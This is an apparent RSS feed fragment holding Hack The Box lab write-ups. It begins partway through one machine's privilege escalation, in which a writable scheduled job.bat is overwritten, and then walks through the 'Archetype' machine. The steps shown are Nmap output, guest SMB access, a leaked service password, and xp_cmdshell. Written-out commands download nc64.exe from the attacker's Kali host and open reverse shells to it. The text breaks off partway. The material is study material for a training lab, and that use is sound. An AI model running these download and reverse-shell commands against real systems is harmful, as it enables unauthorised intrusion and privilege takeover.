  
  Privilege Escalation
&lt;/h2&gt;

&lt;p&gt;HTB provides us with a useful clue by directing us to the Log-Management directory, which contains a file called job.bat.&lt;/p&gt;

&lt;p&gt;When we attempt to run the batch file, it displays an error indicating that the script requires Administrator privileges to execute successfully.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh0fd24ydtdq0qdf9hse7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh0fd24ydtdq0qdf9hse7.png" alt=" " width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we inspect the contents of job.bat, we can see that it executes another program called &lt;strong&gt;wevtutil.exe&lt;/strong&gt;, a built-in Windows utility used to manage Windows Event Logs. In this case, the script uses it to enumerate and clear the Event Logs.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0357l4w1st3zqs5texjq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0357l4w1st3zqs5texjq.png" alt=" " width="800" height="367"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we use the PowerShell command &lt;code&gt;ps&lt;/code&gt;, we can see that the &lt;strong&gt;wevtutil.exe&lt;/strong&gt; process is running even though we were unable to execute job.bat ourselves due to insufficient privileges. This suggests that job.bat may be scheduled to be executed automatically with SYSTEM-level privileges&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjxgadoped9z5ha8qvkvc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjxgadoped9z5ha8qvkvc.png" alt=" " width="800" height="46"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hence, one possible attack chain is to rewrite the contents of job.bat so that it executes nc64.exe and establishes a connection back to our Kali machine’s listening server. If job.bat is indeed being executed with SYSTEM-level privileges, the resulting Windows command shell would inherit those same privileges, potentially giving us a SYSTEM-level shell.&lt;/p&gt;

&lt;p&gt;We first check whether the daniel user has permission to modify job.bat by using the icacls command: &lt;code&gt;icacls job.bat&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftvy3sfggj15qwnjyo70n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftvy3sfggj15qwnjyo70n.png" alt=" " width="798" height="244"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see that members of BUILTIN\Users have Full Control over this file. We can therefore check whether the daniel user is a member of this group by using: &lt;code&gt;whoami /groups&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fsixloan1kn0l8jjn3e4w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fsixloan1kn0l8jjn3e4w.png" alt=" " width="800" height="197"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see that Daniel is indeed a member of BUILTIN\Users&lt;/p&gt;

&lt;p&gt;Now on Kali machine, we can start a simple HTTP server on the directory that contains &lt;strong&gt;nc64.exe&lt;/strong&gt; -&amp;gt; &lt;code&gt;python -m http.server 80&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Next, start a Netcat listener on the Kali machine using the port of your choice (in my case, port 8000)&lt;/p&gt;

&lt;p&gt;Retrieve &lt;strong&gt;nc64.exe&lt;/strong&gt; file on the target machine by using powershell command -&amp;gt; &lt;code&gt;wget http://{kali machine ip}/nc64.exe -outfile {name of file you want to assign}&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4ekz6w8oqwm25wg6weki.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4ekz6w8oqwm25wg6weki.png" alt=" " width="800" height="327"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can now overwrite the content of job.bat with the following command:&lt;br&gt;
&lt;code&gt;Set-Content -Path C:\Log-Management\job.bat -Value 'C:\Log-Management\nc64.exe -e cmd.exe {kali machine ip} {port of your listening server that you assigned}'&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Confirm that the content has been overwritten:&lt;br&gt;
&lt;code&gt;Get-Content C:\Log-Management\job.bat&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frubwi9fy0u52uxma9diy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frubwi9fy0u52uxma9diy.png" alt=" " width="800" height="71"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We then wait for job.bat to be executed and for it to establish a connection back to our Kali listener. Then navigate to the administrator Desktop to find the &lt;strong&gt;root flag&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhb8brqvemk0yih1ua90i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhb8brqvemk0yih1ua90i.png" alt=" " width="800" height="730"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Archetype</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 15 Sep 2026 19:22:28 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-archetype-25l2</link>
      <guid>https://dev.to/zkrnvkf/htb-archetype-25l2</guid>
      <description>&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;This was a fun machine to do :)&lt;/p&gt;

&lt;p&gt;After the Nmap enumeration, we obtained the following results:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-15 11:05 -0400
Nmap scan report for 10.129.192.92
Host is up (0.24s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
&lt;/span&gt;&lt;span class="gp"&gt;1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;RTM
&lt;span class="go"&gt;| ms-sql-info: 
|   10.129.192.92:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-09-15T14:24:02
|_Not valid after:  2056-09-15T14:24:02
| ms-sql-ntlm-info: 
|   10.129.192.92:1433: 
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
&lt;/span&gt;&lt;span class="gp"&gt;|_ssl-date: 2026-09-15T15:07:05+00:00;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;0s from scanner time.
&lt;span class="go"&gt;5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
&lt;/span&gt;&lt;span class="gp"&gt;Service Info: OSs: Windows, Windows Server 2008 R2 - 2012;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;CPE: cpe:/o:microsoft:windows
&lt;span class="go"&gt;Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h24m01s, deviation: 3h07m51s, median: 0s
| smb2-time: 
|   date: 2026-09-15T15:06:51
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-09-15T08:06:54-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.77 seconds
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From the scan, we can identify a few important details:&lt;/p&gt;

&lt;p&gt;-&amp;gt; Port 445 (SMB) and 1344 (SQL Server) are opened&lt;br&gt;
-&amp;gt; We found one user account called guest&lt;br&gt;
-&amp;gt; This machine is part of the Domain called Archetype&lt;/p&gt;

&lt;p&gt;Since port 445 is open, my first instinct was to try connecting to the target machine using the administrator account with an empty password. Unfortunately, this failed.&lt;/p&gt;

&lt;p&gt;As the next step, I decided to enumerate the SMB shares that might be accessible using the guest account.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;smbclient -L //10.129.193.31&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffg7btya946mvud293kr9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffg7btya946mvud293kr9.png" alt=" " width="800" height="256"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We found a share called backups, so I tried accessing it through SMB.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;smbclient //10.129.193.31/backups -U "guest"&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7d5nruvl38khtae91db4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7d5nruvl38khtae91db4.png" alt=" " width="799" height="294"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inside the share, we found a file called prod.dtsConfig. I downloaded it using the get command and opened it on my Kali machine.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fsaekksk4d5so6y36ic31.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fsaekksk4d5so6y36ic31.png" alt=" " width="799" height="162"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The file exposed two important pieces of information:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A Windows domain account called &lt;strong&gt;ARCHETYPE/mysql_svc&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;The password &lt;strong&gt;M3g4c0rp123&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;One important thing to note is that the account we just compromised is a Windows domain account, rather than a native SQL Server username/password account.&lt;/p&gt;

&lt;p&gt;In order to obtain the user flag, we need an interactive shell on the target machine. I initially tried using impacket-psexec to gain access, but it failed, so I had to look for another way to obtain a shell.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzwmu13rhzjn6ghwsw1gz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzwmu13rhzjn6ghwsw1gz.png" alt=" " width="799" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One approach was to make the target machine execute a binary that would establish a reverse shell back to a listener on my Kali machine.&lt;/p&gt;

&lt;p&gt;I searched for a suitable binary that could be executed on Windows and came across the following:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7umfxwfvqie4yctwj75i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7umfxwfvqie4yctwj75i.png" alt=" " width="800" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I then searched for a GitHub repository that provided nc.exe and found the following repository: &lt;a href="https://github.com/int0x33/nc.exe/blob/master/nc64.exe" rel="noopener noreferrer"&gt;https://github.com/int0x33/nc.exe/blob/master/nc64.exe&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frn76xr9mh6p2lh0xzt0v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frn76xr9mh6p2lh0xzt0v.png" alt=" " width="800" height="252"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I downloaded the &lt;strong&gt;nc64.exe&lt;/strong&gt; (64 because we need an executable built for 64-bit Windows architecture).&lt;/p&gt;

&lt;p&gt;Next, I started a simple HTTP Server from the directory containing the nc64.exe file using the following command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -m http.server 80&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now we need to transfer the nc64.exe file from our Kali machine to the target Windows machine.&lt;/p&gt;

&lt;p&gt;First, we can use the &lt;strong&gt;impacket-mssqlclient&lt;/strong&gt; command with the option -windows-auth, as shown in the image below. This option allows us to &lt;strong&gt;authenticate to Microsoft SQL Server using Windows authentication.&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fyamn69smbs5cfjduqi8y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fyamn69smbs5cfjduqi8y.png" alt=" " width="799" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see that xp_cmdshell allows us to execute Windows commands on the SQL Server host.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fbuvtue6if6k5lrzbateo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fbuvtue6if6k5lrzbateo.png" alt=" " width="800" height="448"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I only learned after completing this machine and reading the official write-up that we can also execute PowerShell commands through xp_cmdshell using &lt;strong&gt;xp_cmdshell “powershell -c "&lt;/strong&gt;. This is a much cleaner approach, so I will use it for this write-up.&lt;/p&gt;

&lt;p&gt;We can use the PowerShell command to retrieve the nc64.exe file from the HTTP server running on our Kali machine and save it to the sql_svc user’s directory.&lt;br&gt;
&lt;code&gt;xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads ; wget http://&amp;lt;Your kali machine ip&amp;gt;/nc64.exe -outfile &amp;lt;name you want to assign&amp;gt;"&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fy3mt9guj1b6mkbuaaxm7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fy3mt9guj1b6mkbuaaxm7.png" alt=" " width="800" height="63"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can also see that our HTTP server received an HTTP GET request for nc64.exe with a status code of 200, indicating that the download was successful.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvz8xindz1o3kk0lfhrdh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvz8xindz1o3kk0lfhrdh.png" alt=" " width="799" height="150"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can further confirm that the nc64.exe file was successfully transferred to the Windows machine under the sql_svc user’s directory.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqcays7cd9zy7tkw99qp7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqcays7cd9zy7tkw99qp7.png" alt=" " width="800" height="257"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, we set up a listener on our Kali machine using the port of our choice. I chose port 8000.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fa7mao8zhtttojdactjw3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fa7mao8zhtttojdactjw3.png" alt=" " width="552" height="212"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can then execute nc64.exe on the target machine, using cmd.exe as the Windows command-line shell, and connect it back to the Kali machine’s IP address and listening port (8000 in my case).&lt;br&gt;
&lt;code&gt;xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads ; ./nc64.exe -e cmd.exe 10.10.15.17 8000"&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc81tndn6p2zru7nknzs5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc81tndn6p2zru7nknzs5.png" alt=" " width="792" height="30"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can now interact with the target through the listener and navigate to the sql_svc user’s Desktop to retrieve the &lt;strong&gt;user flag&lt;/strong&gt;.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7gnwz91e4m2xziawjr63.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7gnwz91e4m2xziawjr63.png" alt=" " width="800" height="644"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now that we have obtained the user flag, the next step is privilege escalation to administrator in order to retrieve the root flag.&lt;/p&gt;

&lt;p&gt;Based on the HTB guidance, we can use &lt;strong&gt;WinPEAS&lt;/strong&gt; to enumerate the system and identify potential privilege-escalation opportunities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;WinPEAS (Windows Privilege Escalation Awesome Scripts)&lt;/strong&gt; is an enumeration tool used to search a Windows system for potential privilege-escalation opportunities.&lt;/p&gt;

&lt;p&gt;It checks things such as:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;User privileges and groups&lt;/li&gt;
&lt;li&gt;Services and their permissions&lt;/li&gt;
&lt;li&gt;Scheduled tasks&lt;/li&gt;
&lt;li&gt;Registry settings&lt;/li&gt;
&lt;li&gt;Stored credentials&lt;/li&gt;
&lt;li&gt;Writable files/directories&lt;/li&gt;
&lt;li&gt;Installed software and configurations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can download winPEASx64.exe from &lt;code&gt;https://github.com/peass-ng/PEASS-ng/releases/tag/20260914-474d0061&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Faryn4hddv1ftdykrkrv8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Faryn4hddv1ftdykrkrv8.png" alt=" " width="388" height="100"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since we already have an interactive shell session through our listener, we can:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Start the HTTP server in the directory containing winPEASx64.exe&lt;/li&gt;
&lt;li&gt;Start PowerShell from our interactive shell and retrieve winPEASx64.exe from our HTTP server
&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxc9x65h5s3a3fdu0gfct.png" alt=" " width="798" height="132"&gt;
&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fx5hcxcjpre17puuqor8d.png" alt=" " width="799" height="142"&gt;
&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4zir6mpb6o94rmkqqfuc.png" alt=" " width="800" height="323"&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Once we execute &lt;strong&gt;winPEASx64.exe&lt;/strong&gt; on the target machine as the sql_svc user, it produces a large amount of output. It took me some time to find the relevant information, but eventually I found the file below, which contained the password for the domain administrator account.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fk3k4257upwhdtkkwk1mp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fk3k4257upwhdtkkwk1mp.png" alt=" " width="800" height="161"&gt;&lt;/a&gt;&lt;br&gt;
